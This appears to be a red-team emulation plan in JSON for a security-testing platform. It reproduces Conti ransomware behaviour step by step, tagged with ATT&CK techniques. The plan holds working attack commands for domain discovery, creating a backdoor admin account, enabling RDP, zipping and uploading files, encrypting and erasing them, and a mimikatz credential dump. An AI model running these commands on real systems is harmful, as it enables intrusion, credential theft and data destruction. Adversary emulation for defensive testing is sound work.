{ "threat": { "category": "User-Defined", "description": "Conti ransomware based on The DFIR Report: https://thedfirreport.com/2021/05/12/conti-ransomware/", "display_name": "Conti", "name": "Conti", "operating_system_name": "windows", "script": { "0": { "conf": "{\"--cp\":\"127.0.0.1:443\",\"--secure\":true,\"--multipart\":10240,\"--heartbeat\":62,\"--jitter\":39}", "module": "https", "type": "initialization" }, "1": { "name": "STEP", "type": "assign", "value": "DISCOVERY" }, "2": { "module": "loader", "module_to_load": "run", "request": "--load run", "type": "message" }, "3": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "ipconfig /all", "rtags": [ "att&ck-technique:T1016" ], "type": "message" }, "4": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "systeminfo", "rtags": [ "att&ck-technique:T1082" ], "type": "message" }, "5": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "whoami /groups", "rtags": [ "att&ck-technique:T1069.001" ], "type": "message" }, "6": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "net config workstation", "rtags": [ "att&ck-technique:T1049" ], "type": "message" }, "7": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "net use", "rtags": [ "att&ck-technique:T1021.002" ], "type": "message" }, "8": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "echo %userdomain%", "rtags": [ "att&ck-technique:T1078.002" ], "type": "message" }, "9": { "function": "ifelse", "next": "15", "step": "8", "type": "decision", "value": "The system cannot find the file specified.", "verb": "contains" }, "10": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "nltest /domain_trusts", "rtags": [ "att&ck-technique:T1482" ], "type": "message" }, "11": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "nltest /domain_trusts /all_trusts", "rtags": [ "att&ck-technique:T1482" ], "type": "message" }, "12": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "net view /all /domain", "rtags": [ "att&ck-technique:T1087.002" ], "type": "message" }, "13": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "net view /all", "rtags": [ "att&ck-technique:T1069.001" ], "type": "message" }, "14": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "net group \"Domain Admins\" /domain", "rtags": [ "att&ck-technique:T1087.002" ], "type": "message" }, "15": { "name": "STEP", "type": "assign", "value": "PERSIST" }, "16": { "depends_on": "8a328046-158f-4bce-bc3c-3c9b5b177512", "module": "controller", "request": "--integrity", "type": "message" }, "17": { "function": "ifelse", "next": "22", "step": "16", "type": "decision", "value": "High", "verb": "does not contain" }, "18": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "net user /add /Y nuuser 7HeC00l3stP@ssw0rd", "rtags": [ "att&ck-technique:T1136" ], "type": "message" }, "19": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "net localgroup administrators nuuser /add", "rtags": [ "att&ck-technique:T1136.001" ], "type": "message" }, "20": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "cmd.exe /C reg add \"hklm\\system\\currentControlSet\\Control\\Terminal Server\" /v \"fDenyTSConnections\" /t REG_DWORD /d 0x0 /f", "rtags": [ "att&ck-technique:T1021.001" ], "type": "message" }, "21": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "cmd /c sc.exe create Conti binpath= c:\\windows\\system32\\Conti.exe type= share start= auto", "rtags": [ "att&ck-technique:T1543.003" ], "type": "message" }, "22": { "name": "STEP", "type": "assign", "value": "IMPACT" }, "23": { "module": "loader", "module_to_load": "crypt", "request": "--load crypt", "type": "message" }, "24": { "module": "loader", "module_to_load": "downloader", "request": "--load downloader", "type": "message" }, "25": { "module": "loader", "module_to_load": "file", "request": "--load file", "type": "message" }, "26": { "module": "loader", "module_to_load": "uploader", "request": "--load uploader", "type": "message" }, "27": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "powershell mkdir \"%USERPROFILE%\\Desktop\\Conti\"", "rtags": [ "att&ck-technique:T1059.001" ], "type": "message" }, "28": { "depends_on": "e96eccc9-6c98-4246-b809-1849684c7df2", "module": "file", "request": "--create --path \"%USERPROFILE%\\Desktop\\Conti\\target_file.doc\" --size 1MB --count 100 --random", "rtags": [ "att&ck-technique:T1074.001" ], "type": "message" }, "29": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "powershell \"Compress-Archive -Path $env:userprofile\\Desktop\\Conti -CompressionLevel Optimal -Destination $env:userprofile\\Desktop\\exfil.zip\"", "rtags": [ "att&ck-technique:T1560.002" ], "type": "message" }, "30": { "module": "uploader", "request": "--remotepath \"%USERPROFILE%\\Desktop\\exfil.zip\"", "rtags": [ "att&ck-technique:T1041" ], "type": "message" }, "31": { "depends_on": "ff705b65-037a-4f06-b21e-e74e6cfe32bc", "module": "crypt", "request": "--target \"%USERPROFILE%\\Desktop\\Conti\\\" --encrypt --password \"dTonVhthjUJCMM6JkCi8\" --erase", "rtags": [ "att&ck-technique:T1486" ], "type": "message" }, "32": { "depends_on": "6f076e51-2e23-46c2-b88e-4505902f960e", "module": "downloader", "request": "--src \"VFS:/shared/Conti/readme.txt\" --dest \"%USERPROFILE%\\Desktop\\readme.txt\"", "rtags": [ "att&ck-technique:T1491.001" ], "type": "message" }, "33": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "powershell notepad \"%USERPROFILE%\\Desktop\\readme.txt\"", "rtags": [ "att&ck-technique:T1059.001" ], "type": "message" }, "34": { "name": "STEP", "type": "assign", "value": "CLEANUP" }, "35": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "cmd /c rmdir /Q /S %USERPROFILE%\\Desktop\\Conti\"", "rtags": [], "type": "message" }, "36": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "cmd /c del \"%USERPROFILE%\\Desktop\\exfil.zip\"", "rtags": [], "type": "message" }, "37": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "cmd /c del \"%USERPROFILE%\\Desktop\\README.txt\"", "rtags": [], "type": "message" }, "38": { "depends_on": "8a328046-158f-4bce-bc3c-3c9b5b177512", "module": "controller", "request": "--integrity", "type": "message" }, "39": { "function": "ifelse", "next": "46", "step": "38", "type": "decision", "value": "High", "verb": "does not contain" }, "40": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "cmd.exe /C reg add \"hklm\\system\\currentControlSet\\Control\\Terminal Server\" /v \"fDenyTSConnections\" /t REG_DWORD /d 0x1 /f", "rtags": [ "att&ck-technique:T1112" ], "type": "message" }, "41": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "net localgroup administrators nuuser /del", "rtags": [], "type": "message" }, "42": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "net user /del nuuser", "rtags": [ "att&ck-technique:T1531" ], "type": "message" }, "43": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "sc delete Conti", "rtags": [ "att&ck-technique:T1489" ], "type": "message" }, "44": { "module": "loader", "module_to_load": "mimikatz", "request": "--load mimikatz", "type": "message" }, "45": { "depends_on": "acc295cf-e232-4a4d-9210-1a6911beb4f8", "module": "mimikatz", "request": "--arglist sekurlsa::logonPasswords", "rtags": [ "att&ck-technique:T1003.001" ], "type": "message" }, "46": { "module": "controller", "request": "--shutdown", "rtags": [ "scythe", "att&ck", "att&ck-tactic:TA0011", "att&ck-technique:T1219" ], "type": "message" } }, "signature": "3ce1cbeedb097e1a0c3b83ebdd6c955a7433cf29" } }